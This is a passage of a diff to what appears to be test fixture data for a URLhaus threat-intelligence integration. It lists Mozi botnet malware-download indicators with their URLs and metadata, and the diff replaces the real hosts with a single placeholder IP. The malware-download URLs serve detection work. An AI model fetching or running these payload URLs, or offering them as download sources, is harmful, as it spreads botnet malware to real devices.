listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27717,18 +27717,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.44.18:59085/Mozi.m", + "original": "http://89.160.20.156:59085/Mozi.m", "scheme": "http", "port": 59085, - "domain": "59.99.44.18", - "full": "http://59.99.44.18:59085/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59085/Mozi.m" }, - "ip": "59.99.44.18" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694623266Z", - "original": "{\"id\":\"960977\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960977/\",\"url\":\"http://59.99.44.18:59085/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.44.18\",\"date_added\":\"2021-01-14 16:16:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028790Z", + "original": "{\"id\":\"960977\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960977/\",\"url\":\"http://89.160.20.156:59085/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:16:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27766,18 +27766,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://59.58.148.90:33799/i", + "original": "http://89.160.20.156:33799/i", "scheme": "http", "port": 33799, - "domain": "59.58.148.90", - "full": "http://59.58.148.90:33799/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33799/i" }, - "ip": "59.58.148.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694626482Z", - "original": "{\"id\":\"960976\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960976/\",\"url\":\"http://59.58.148.90:33799/i\",\"url_status\":\"online\",\"host\":\"59.58.148.90\",\"date_added\":\"2021-01-14 16:09:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028796800Z", + "original": "{\"id\":\"960976\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960976/\",\"url\":\"http://89.160.20.156:33799/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:09:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27815,18 +27815,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.142.249:40430/Mozi.m", + "original": "http://89.160.20.156:40430/Mozi.m", "scheme": "http", "port": 40430, - "domain": "59.99.142.249", - "full": "http://59.99.142.249:40430/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40430/Mozi.m" }, - "ip": "59.99.142.249" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694629798Z", - "original": "{\"id\":\"960972\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960972/\",\"url\":\"http://59.99.142.249:40430/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.142.249\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028803500Z", + "original": "{\"id\":\"960972\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960972/\",\"url\":\"http://89.160.20.156:40430/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27864,18 +27864,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.47.139:43006/Mozi.m", + "original": "http://89.160.20.156:43006/Mozi.m", "scheme": "http", "port": 43006, - "domain": "59.99.47.139", - "full": "http://59.99.47.139:43006/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43006/Mozi.m" }, - "ip": "59.99.47.139" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694633044Z", - "original": "{\"id\":\"960973\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960973/\",\"url\":\"http://59.99.47.139:43006/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.47.139\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028810100Z", + "original": "{\"id\":\"960973\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960973/\",\"url\":\"http://89.160.20.156:43006/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27913,18 +27913,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.157.50.58:33385/Mozi.m", + "original": "http://89.160.20.156:33385/Mozi.m", "scheme": "http", "port": 33385, - "domain": "61.157.50.58", - "full": "http://61.157.50.58:33385/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33385/Mozi.m" }, - "ip": "61.157.50.58" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694636541Z", - "original": "{\"id\":\"960974\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960974/\",\"url\":\"http://61.157.50.58:33385/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.157.50.58\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028816600Z", + "original": "{\"id\":\"960974\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960974/\",\"url\":\"http://89.160.20.156:33385/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27962,18 +27962,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.137.157:56649/Mozi.m", + "original": "http://89.160.20.156:56649/Mozi.m", "scheme": "http", "port": 56649, - "domain": "59.99.137.157", - "full": "http://59.99.137.157:56649/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56649/Mozi.m" }, - "ip": "59.99.137.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694640428Z", - "original": "{\"id\":\"960975\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960975/\",\"url\":\"http://59.99.137.157:56649/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.137.157\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028823400Z", + "original": "{\"id\":\"960975\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960975/\",\"url\":\"http://89.160.20.156:56649/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28011,18 +28011,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.137.202:55457/Mozi.m", + "original": "http://89.160.20.156:55457/Mozi.m", "scheme": "http", "port": 55457, - "domain": "59.99.137.202", - "full": "http://59.99.137.202:55457/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55457/Mozi.m" }, - "ip": "59.99.137.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694643995Z", - "original": "{\"id\":\"960971\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960971/\",\"url\":\"http://59.99.137.202:55457/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.137.202\",\"date_added\":\"2021-01-14 16:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028829900Z", + "original": "{\"id\":\"960971\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960971/\",\"url\":\"http://89.160.20.156:55457/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28060,18 +28060,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.16.213:52314/Mozi.m", + "original": "http://89.160.20.156:52314/Mozi.m", "scheme": "http", "port": 52314, - "domain": "59.93.16.213", - "full": "http://59.93.16.213:52314/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52314/Mozi.m" }, - "ip": "59.93.16.213" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694647201Z", - "original": "{\"id\":\"960968\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960968/\",\"url\":\"http://59.93.16.213:52314/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.16.213\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028836500Z", + "original": "{\"id\":\"960968\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960968/\",\"url\":\"http://89.160.20.156:52314/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28109,18 +28109,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.230.56.231:41985/Mozi.m", + "original": "http://89.160.20.156:41985/Mozi.m", "scheme": "http", "port": 41985, - "domain": "42.230.56.231", - "full": "http://42.230.56.231:41985/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:41985/Mozi.m" }, - "ip": "42.230.56.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694650527Z", - "original": "{\"id\":\"960969\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960969/\",\"url\":\"http://42.230.56.231:41985/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.230.56.231\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028843100Z", + "original": "{\"id\":\"960969\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960969/\",\"url\":\"http://89.160.20.156:41985/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28158,18 +28158,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://125.41.97.157:53197/i", + "original": "http://89.160.20.156:53197/i", "scheme": "http", "port": 53197, - "domain": "125.41.97.157", - "full": "http://125.41.97.157:53197/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:53197/i" }, - "ip": "125.41.97.157" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694653974Z", - "original": "{\"id\":\"960970\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960970/\",\"url\":\"http://125.41.97.157:53197/i\",\"url_status\":\"online\",\"host\":\"125.41.97.157\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.028849800Z", + "original": "{\"id\":\"960970\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960970/\",\"url\":\"http://89.160.20.156:53197/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28207,18 +28207,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.43.61.168:54472/Mozi.m", + "original": "http://89.160.20.156:54472/Mozi.m", "scheme": "http", "port": 54472, - "domain": "125.43.61.168", - "full": "http://125.43.61.168:54472/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54472/Mozi.m" }, - "ip": "125.43.61.168" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694657290Z", - "original": "{\"id\":\"960967\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960967/\",\"url\":\"http://125.43.61.168:54472/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.43.61.168\",\"date_added\":\"2021-01-14 16:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028856400Z", + "original": "{\"id\":\"960967\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960967/\",\"url\":\"http://89.160.20.156:54472/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28256,18 +28256,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.154.101.44:38100/Mozi.m", + "original": "http://89.160.20.156:38100/Mozi.m", "scheme": "http", "port": 38100, - "domain": "219.154.101.44", - "full": "http://219.154.101.44:38100/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38100/Mozi.m" }, - "ip": "219.154.101.44" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694660626Z", - "original": "{\"id\":\"960966\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960966/\",\"url\":\"http://219.154.101.44:38100/Mozi.m\",\"url_status\":\"offline\",\"host\":\"219.154.101.44\",\"date_added\":\"2021-01-14 16:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028863Z", + "original": "{\"id\":\"960966\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960966/\",\"url\":\"http://89.160.20.156:38100/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28305,18 +28305,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://189.51.126.160:33121/Mozi.m", + "original": "http://89.160.20.156:33121/Mozi.m", "scheme": "http", "port": 33121, - "domain": "189.51.126.160", - "full": "http://189.51.126.160:33121/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33121/Mozi.m" }, - "ip": "189.51.126.160" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694663842Z", - "original": "{\"id\":\"960964\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960964/\",\"url\":\"http://189.51.126.160:33121/Mozi.m\",\"url_status\":\"offline\",\"host\":\"189.51.126.160\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028869900Z", + "original": "{\"id\":\"960964\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960964/\",\"url\":\"http://89.160.20.156:33121/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28354,18 +28354,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://14.154.28.65:39363/Mozi.m", + "original": "http://89.160.20.156:39363/Mozi.m", "scheme": "http", "port": 39363, - "domain": "14.154.28.65", - "full": "http://14.154.28.65:39363/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39363/Mozi.m" }, - "ip": "14.154.28.65" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694667178Z", - "original": "{\"id\":\"960965\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960965/\",\"url\":\"http://14.154.28.65:39363/Mozi.m\",\"url_status\":\"online\",\"host\":\"14.154.28.65\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028876600Z", + "original": "{\"id\":\"960965\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960965/\",\"url\":\"http://89.160.20.156:39363/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28403,18 +28403,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.119.18.6:42844/Mozi.m", + "original": "http://89.160.20.156:42844/Mozi.m", "scheme": "http", "port": 42844, - "domain": "182.119.18.6", - "full": "http://182.119.18.6:42844/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42844/Mozi.m" }, - "ip": "182.119.18.6" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694670374Z", - "original": "{\"id\":\"960961\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960961/\",\"url\":\"http://182.119.18.6:42844/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.119.18.6\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028883300Z", + "original": "{\"id\":\"960961\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960961/\",\"url\":\"http://89.160.20.156:42844/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28452,18 +28452,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://219.156.209.2:45789/Mozi.a", + "original": "http://89.160.20.156:45789/Mozi.a", "scheme": "http", "port": 45789, - "domain": "219.156.209.2", - "full": "http://219.156.209.2:45789/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45789/Mozi.a" }, - "ip": "219.156.209.2" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694673340Z", - "original": "{\"id\":\"960962\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960962/\",\"url\":\"http://219.156.209.2:45789/Mozi.a\",\"url_status\":\"online\",\"host\":\"219.156.209.2\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028890100Z", + "original": "{\"id\":\"960962\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960962/\",\"url\":\"http://89.160.20.156:45789/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28501,18 +28501,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.15.193.168:34080/Mozi.m", + "original": "http://89.160.20.156:34080/Mozi.m", "scheme": "http", "port": 34080, - "domain": "221.15.193.168", - "full": "http://221.15.193.168:34080/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34080/Mozi.m" }, - "ip": "221.15.193.168" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694676476Z", - "original": "{\"id\":\"960963\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960963/\",\"url\":\"http://221.15.193.168:34080/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.15.193.168\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028896600Z", + "original": "{\"id\":\"960963\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960963/\",\"url\":\"http://89.160.20.156:34080/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28550,18 +28550,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.194.161.162:56067/Mozi.m", + "original": "http://89.160.20.156:56067/Mozi.m", "scheme": "http", "port": 56067, - "domain": "117.194.161.162", - "full": "http://117.194.161.162:56067/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56067/Mozi.m" }, - "ip": "117.194.161.162" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694679972Z", - "original": "{\"id\":\"960960\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960960/\",\"url\":\"http://117.194.161.162:56067/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.194.161.162\",\"date_added\":\"2021-01-14 16:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028903300Z", + "original": "{\"id\":\"960960\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960960/\",\"url\":\"http://89.160.20.156:56067/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:11 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28599,18 +28599,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.215.208.204:34205/Mozi.m", + "original": "http://89.160.20.156:34205/Mozi.m", "scheme": "http", "port": 34205, - "domain": "117.215.208.204", - "full": "http://117.215.208.204:34205/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34205/Mozi.m" }, - "ip": "117.215.208.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694683229Z", - "original": "{\"id\":\"960959\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960959/\",\"url\":\"http://117.215.208.204:34205/Mozi.m\",\"url_status\":\"offline\",\"host\":\"117.215.208.204\",\"date_added\":\"2021-01-14 16:05:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028909900Z", + "original": 